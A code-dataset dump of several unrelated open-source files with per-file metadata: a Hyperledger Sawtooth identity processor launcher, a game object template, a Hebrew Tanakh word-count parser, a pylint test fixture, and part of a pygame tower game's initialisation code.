# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import sys
import os
import argparse
import pkg_resources
# Adding the necessary path to PYTHONPATH
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
# If no toml, try loading yaml
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
# use the transaction processor zmq identity for filename
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e: # pylint: disable=broad-except
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
| 33.145038
| 80
| 0.688392
|
import sys
import os
import argparse
import pkg_resources
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e:
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
| true
| true
|
f70b5fcacbe25a93df7d8bed3dc476118eb19b62
| 464
|
py
|
Python
|
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/space/shields/shared_adv_deflector_shields.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 27.294118
| 90
| 0.734914
| true
| true
|
|
f70b5fe0481a8c9a2817f06ed651a862a7858a27
| 6,023
|
py
|
Python
|
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | null | null | null |
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | 11
|
2020-11-20T20:23:00.000Z
|
2021-01-28T14:23:19.000Z
|
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | 1
|
2021-01-01T20:06:01.000Z
|
2021-01-01T20:06:01.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""Download and parse Tanakh from <http://mechon-mamre.org/>.
The text is based on the [Aleppo Codex][1].
[1]: https://en.wikipedia.org/wiki/Aleppo_Codex
Each book is in a separate HTML file (e.g., `c01.htm`) and contains navigation
and textual data.
The relevant structure is:
```html
<BODY>
<H1>...</H1>
<P>
<B>...,...</B> ...
</P>
</BODY>
```
Notes:
- verses are newline-delimited
- `<H1>` Hebrew book name
- `<B>` comma-separated Hebrew numbering of chapter and verse
- for multipart volumes (e.g., Samuel, Kings) also contains the part number
- `<BIG>`, `<SMALL>`, `<SUP>` around specific letter (we keep)
- `<A...>...</A>` links to notes (we ignore)
- `<BR>` within the text indicates a line break (we replace with a space)
- `{...}<BR>` indicates `pe` break (we ignore)
- `{...}` indicates `samekh` break (we ignore)
- `(...)` indicates the qere (we keep)
- the unvowelized previous word is the ketiv (we ignore)
"""
# native
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
# lib
from tqdm import tqdm
# pkg
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
#
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
#
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
"""Count words in a book."""
# pylint: disable=too-many-locals
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
# book_num = int(book.stem[1:], 10)
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
# result["books"].append(
# dict(id=book_num, name=book_name, corpus="mechon-mamre.org")
# )
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line) # reference removed
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
"""Enqueue paths of books to parse."""
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
"""Parse texts from <http://mechon-mamre.org>.
Usage: mechon_mamre_org.py [download <folder> | -i <PATH>] [-n COUNT]
Options:
download <folder> download HTML files to <folder>
--index, -i PATH HTML folder [default: text/mechon-mamre.org]
--cpus, -n NUM number of CPUs to use; at least 2 [default: all]
"""
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__": # pragma: no cover
main()
| 30.573604
| 85
| 0.546738
|
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
from tqdm import tqdm
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line)
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__":
main()
| true
| true
|
f70b602fa67e6e8b514ce3156eac1f98c7a45b36
| 303
|
py
|
Python
|
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
##Patterns: R0914: { "max-locals": "3" }
##Warn: R0914
def doEverything(thing):
a = 3
b = 3
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
| 12.625
| 41
| 0.30363
|
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
| true
| true
|
f70b604cbbd058238c84f4a1dabfc8279733f7ac
| 9,038
|
py
|
Python
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 36
|
2019-07-26T09:19:28.000Z
|
2022-02-20T07:14:50.000Z
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 1
|
2019-02-03T01:51:46.000Z
|
2019-02-03T01:51:46.000Z
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 11
|
2019-02-02T13:49:26.000Z
|
2022-03-09T13:25:41.000Z
|
# 作为新框架测试用
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
# 如果是Windows系统,在游戏中禁用显示缩放
# 注:通常高分屏用户在使用Windows系统时,都会把缩放调到100%以上,否则会瞎眼。
# 例如1920*1080屏幕,Windows推荐的缩放率就是125%。
# 这样会导致游戏窗口被严重放大,造成一部分游戏画面处在任务栏下方。
# 然而,在Linux系统下并没有这问题,所以这里只判定是否为Windows。
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
# 设置游戏窗口大小
screen = pygame.display.set_mode([WIDTH, HEIGHT])
# 设置窗口标题
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
# 设置PlayerCon为全局变量(必须要在CurrentMap.set_map之前完成)
global_var.set_value("PlayerCon", PlayerCon)
# 初始化地图
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
# 初始化BlockData(建立通过id反查地图编号的字典)
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
# 状态栏占位(如果删除,会影响游戏内地图的位置)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
# 初始化UI图层
# --- UI0 - 状态栏
STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
STATUSBAR.priority = 145
RootScreen.add_child(STATUSBAR)
global_var.set_value("STATUSBAR", STATUSBAR)
WriteLog.debug(__name__, "初始化状态栏图层完成")
# --- UI1 - 怪物手册
BOOK = ui.Book(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
BOOK.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(BOOK)
global_var.set_value("BOOK", BOOK)
WriteLog.debug(__name__, "初始化怪物手册图层完成")
# --- UI2 - 开始界面
STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
STARTMENU.priority = 500 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(STARTMENU)
global_var.set_value("STARTMENU", STARTMENU)
WriteLog.debug(__name__, "初始化开始界面图层完成")
# --- UI3 - 背包界面
BACKPACK = ui.Backpack(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
BACKPACK.priority = 150 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(BACKPACK)
global_var.set_value("BACKPACK", BACKPACK)
WriteLog.debug(__name__, "初始化背包图层完成")
# --- UI4 - 存档界面
SAVE = ui.SaveMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
SAVE.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(SAVE)
global_var.set_value("SAVE", SAVE)
WriteLog.debug(__name__, "初始化存档图层完成")
# --- UI5 - 读档界面
LOAD = ui.LoadMenu(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
LOAD.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(LOAD)
global_var.set_value("LOAD", LOAD)
WriteLog.debug(__name__, "初始化读档图层完成")
# --- UI6 - 楼层传送器界面
FLY = ui.Fly(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
FLY.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(FLY)
global_var.set_value("FLY", FLY)
WriteLog.debug(__name__, "初始化楼层传送器图层完成")
# --- UI7 - 帮助界面
HELP = ui.Help(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
HELP.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(HELP)
global_var.set_value("HELP", HELP)
WriteLog.debug(__name__, "初始化帮助图层完成")
# --- UI8 - 商店1界面
Shop1 = ui.Shop1(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
Shop1.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(Shop1)
global_var.set_value("Shop1", Shop1)
WriteLog.debug(__name__, "初始化商店1图层完成")
# --- UI9 - 商店2界面
Shop2 = ui.Shop2(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
Shop2.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(Shop2)
global_var.set_value("Shop2", Shop2)
WriteLog.debug(__name__, "初始化商店2图层完成")
# --- UI10 - 文本框界面
TEXTBOX = ui.TextBox(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
TEXTBOX.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(TEXTBOX)
global_var.set_value("TEXTBOX", TEXTBOX)
WriteLog.debug(__name__, "初始化文本框图层完成")
# --- UI11 - 选择框界面
CHOICEBOX = ui.ChoiceBox(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
CHOICEBOX.priority = 140 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(CHOICEBOX)
global_var.set_value("CHOICEBOX", CHOICEBOX)
WriteLog.debug(__name__, "初始化选择框图层完成")
# --- UI12 - 显伤层
SHOWDAMAGE = ui.ShowDamage(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
SHOWDAMAGE.priority = 65 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(SHOWDAMAGE)
global_var.set_value("SHOWDAMAGE", SHOWDAMAGE)
WriteLog.debug(__name__, "初始化显伤层完成")
# --- UI13 - 色调层
CURTAIN = ui.Curtain(mode='copy', surface=RootScreen) # 必须按ground的方式初始化
CURTAIN.priority = 125 # 显示的优先级 高于地图 所以在地图上
RootScreen.add_child(CURTAIN)
global_var.set_value("CURTAIN", CURTAIN)
WriteLog.debug(__name__, "初始化色调层完成")
WriteLog.info(__name__, "初始化全部UI图层完成")
def init_actions():
# QUIT:
def quit(e):
global running
running = False
return True
# 注册事件
action_control.register_action('QUIT', pygame.QUIT, quit)
action_control.register_action('BOOK', pygame.KEYUP, global_var.get_value('BOOK').action)
action_control.register_action('STARTMENU', pygame.KEYUP, global_var.get_value('STARTMENU').action)
action_control.register_action('BACKPACK', pygame.KEYUP, global_var.get_value('BACKPACK').action)
action_control.register_action('SAVE', pygame.KEYUP, global_var.get_value('SAVE').action)
action_control.register_action('LOAD', pygame.KEYUP, global_var.get_value('LOAD').action)
action_control.register_action('FLY', pygame.KEYUP, global_var.get_value('FLY').action)
action_control.register_action('HELP', pygame.KEYUP, global_var.get_value('HELP').action)
action_control.register_action('Shop1', pygame.KEYUP, global_var.get_value('Shop1').action)
action_control.register_action('Shop2', pygame.KEYUP, global_var.get_value('Shop2').action)
action_control.register_action('TEXTBOX', pygame.KEYUP, global_var.get_value('TEXTBOX').action)
action_control.register_action('CHOICEBOX', pygame.KEYUP, global_var.get_value('CHOICEBOX').action)
action_control.register_action('SHOWDAMAGE', pygame.KEYUP, global_var.get_value('SHOWDAMAGE').action)
action_control.register_action('STATUSBAR', pygame.KEYUP, global_var.get_value('STATUSBAR').action)
action_control.register_action('CURTAIN', pygame.KEYUP, global_var.get_value('CURTAIN').action)
WriteLog.info(__name__, "事件全部注册完成")
def init_sound():
Music = music.MusicWrapper()
global_var.set_value("Music", Music)
WriteLog.info(__name__, "初始化音效完成")
def init_event_flow():
EVENTFLOW = EventFlow()
global_var.set_value("EVENTFLOW", EVENTFLOW)
EVENT = Event()
global_var.set_value("EVENT", EVENT)
EVENT.get_event_flow_module()
EVENTFLOW.get_event_module()
WriteLog.info(__name__, "初始化事件流完成")
def init_function():
FUNCTION = global_var.get_value("FUNCTION")
FUNCTION.init_var()
WriteLog.info(__name__, "初始化function完成")
# DEBUG(开关在sysconf.py,如果开启将会启动控制台)
if DEBUG:
import threading
def console():
while running:
r = input()
try:
print(eval(r))
except:
try:
exec(r)
except Exception as e:
print("error:", str(e))
t = threading.Thread(target=console)
t.start()
init()
init_actions()
init_sound()
init_event_flow()
init_function()
clock = pygame.time.Clock()
STARTMENU = global_var.get_value("STARTMENU")
# 主程序
while running:
# a = pygame.time.get_ticks()
# 展示开始菜单
if STARTMENU.new_game == True:
STARTMENU.open()
STARTMENU.new_game = False
# 默认开启显伤
show_damage = global_var.get_value("SHOWDAMAGE")
show_damage.open()
# 默认开启状态栏
status_bar = global_var.get_value("STATUSBAR")
status_bar.open()
# 地图确保为active状态
CurrentMap.active = True
# 载入初始事件
EVENTFLOW = global_var.get_value("EVENTFLOW")
with open(os.path.join(os.getcwd(),"project", "start_text.json")) as f:
start_text = json.load(f)
EVENTFLOW.insert_action(start_text["startText"])
pygame.display.update()
# 背景
RootScreen.flush(screen) # 显示刷新到屏幕
action_control.action_render() # 检查动作消息
# b = pygame.time.get_ticks()
# print(b - a)
| 35.167315
| 105
| 0.700929
|
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
screen = pygame.display.set_mode([WIDTH, HEIGHT])
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
global_var.set_value("PlayerCon", PlayerCon)
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen)
STATUSBAR.priority = 145
RootScreen.add_child(STATUSBAR)
global_var.set_value("STATUSBAR", STATUSBAR)
WriteLog.debug(__name__, "初始化状态栏图层完成")
BOOK = ui.Book(mode='copy', surface=RootScreen)
BOOK.priority = 140
RootScreen.add_child(BOOK)
global_var.set_value("BOOK", BOOK)
WriteLog.debug(__name__, "初始化怪物手册图层完成")
STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen)
STARTMENU.priority = 500
RootScreen.add_child(STARTMENU)
global_var.set_value("STARTMENU", STARTMENU)
WriteLog.debug(__name__, "初始化开始界面图层完成")
BACKPACK = ui.Backpack(mode='copy', surface=RootScreen)
BACKPACK.priority = 150
RootScreen.add_child(BACKPACK)
global_var.set_value("BACKPACK", BACKPACK)
WriteLog.debug(__name__, "初始化背包图层完成")
SAVE = ui.SaveMenu(mode='copy', surface=RootScreen)
SAVE.priority = 140
RootScreen.add_child(SAVE)
global_var.set_value("SAVE", SAVE)
WriteLog.debug(__name__, "初始化存档图层完成")
LOAD = ui.LoadMenu(mode='copy', surface=RootScreen)
LOAD.priority = 140
RootScreen.add_child(LOAD)
global_var.set_value("LOAD", LOAD)
WriteLog.debug(__name__, "初始化读档图层完成")
FLY = ui.Fly(mode='copy', surface=RootScreen)
FLY.priority = 140
RootScreen.add_child(FLY)
global_var.set_value("FLY", FLY)
WriteLog.debug(__name__, "初始化楼层传送器图层完成")
HELP = ui.Help(mode='copy', surface=RootScreen)
HELP.priority = 140
RootScreen.add_child(HELP)
global_var.set_value("HELP", HELP)
